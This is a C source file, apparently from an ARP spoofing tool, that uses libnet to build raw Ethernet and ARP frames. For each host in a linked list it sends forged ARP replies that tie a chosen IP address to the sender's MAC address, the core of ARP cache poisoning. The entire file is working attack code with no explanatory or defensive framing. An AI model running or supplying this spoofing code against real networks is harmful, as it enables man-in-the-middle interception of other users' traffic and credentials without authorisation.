#include "arp_spoof.h"

int arp_send(struct libnet_link_int *llif, char *dev,
	 int op, u_char *sha, uint32_t spa, u_char *tha, uint32_t tpa)
{
	PSWITCH node = NULL;
	char ebuf[128];
	u_char pkt[60];

	// source hardware address  
	if (sha == NULL &&
	    (sha = (u_char *)libnet_get_hwaddr(llif, dev, ebuf)) == NULL) {
		return (-1);
	}
	// source ip address   
	if (spa == 0) {
		if ((spa = libnet_get_ipaddr(llif, dev, ebuf)) == 0)
			return (-1);
		spa = htonl(spa); 
	}

	// arp reply ??
	if ( op == ARPOP_REPLY ) {
		node = root;
		while (1) {
			tha = node->mac_addr;
			tpa = node->ip_addr;

			libnet_build_ethernet(tha, sha, ETHERTYPE_ARP, NULL, 0, pkt);
	
			libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4,
			 	op, sha, (u_char *)&spa, tha, (u_char *)&tpa,
			 	NULL, 0, pkt + ETH_H);
#if (__DEBUG)
			fprintf(stderr, "%s ", ether_ntoa((struct ether_addr *)sha));
			fprintf(stderr, "%s 0806 42: arp reply %s is-at ",
				ether_ntoa((struct ether_addr *)tha), libnet_host_lookup(spa, 0));
			fprintf(stderr, "%s\n", ether_ntoa((struct ether_addr *)sha));
#endif
			libnet_write_link_layer(llif, dev, pkt, sizeof(pkt));

			if ( node->next != NULL )
				node = node->next;
			else if ( node->next == NULL) 
				break;
		} 
    } else if ( op == ARPOP_REQUEST ) { // arp request??
		tha = "\xff\xff\xff\xff\xff\xff";
		libnet_build_ethernet(tha, sha, ETHERTYPE_ARP, NULL, 0, pkt);

		libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4,
			 	op, sha, (u_char *)&spa, tha, (u_char *)&tpa,
			 	NULL, 0, pkt + ETH_H);
		
#if (__DEBUG)
		fprintf(stderr, "%s 0806 42: arp who-has %s tell %s\n",
					ether_ntoa((struct ether_addr *)tha),
					libnet_host_lookup(tpa, 0),
					libnet_host_lookup(spa, 0));
#endif
		libnet_write_link_layer(llif, dev, pkt, sizeof(pkt));
	}
	return 1;
}
